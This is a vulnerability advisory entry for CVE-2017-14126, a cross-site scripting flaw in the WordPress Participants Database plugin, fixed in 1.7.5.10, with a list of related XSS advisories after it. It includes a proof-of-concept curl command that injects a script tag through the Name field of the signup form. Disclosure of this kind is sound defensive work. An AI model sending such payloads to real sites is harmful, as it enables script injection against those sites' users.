Participants Database <= 1.7.5.9 – Cross-Site Scripting | CVE 2017-14126 | Plugin Vulnerabilities

Description

Cross site scripting (XSS) vulnerability in the Wordpress Participants
Database plugin 1.7.59 allows attackers to inject arbitrary javascript via
the Name parameter.

Proof of Concept

curl -k -F action=signup -F subsource=participants-database -F
shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2
-F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F
first_name=<script>alert("1");</script> -F last_name=a -F email=a@a.com -F
mailing_list=No -F submit_button=Submit http://localhost/?page_id=1

Affects Plugins

participants-database

Fixed in 1.7.5.10

References

CVE

URL

https://limbenjamin.com/articles/cve-2017-14126-participants-database-xss.html

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Submitter

Benjamin Lim

Submitter website

https://limbenjamin.com

Verified

No

WPVDB ID

c7178ca5-4ab8-4234-92b7-6bcf4ee82bf9

Timeline

Publicly Published

2017-09-06 (about 8 years ago)

Added

2017-09-06 (about 8 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2024-08-16

Title

Button contact VR < 4.7.8 - Admin+ Stored XSS

Published

2025-01-16

Title

XTRA Settings <= 2.1.8 - Reflected Cross-Site Scripting

Published

2024-03-26

Title

Elementor Website Builder Pro < 3.20.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Form Widget SVGZ File Upload

Published

2025-07-10

Title

WPC Smart Compare for WooCommerce < 6.4.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-04-04

Title

Xpro Elementor Addons < 1.4.11 - Contributor+ Stored XSS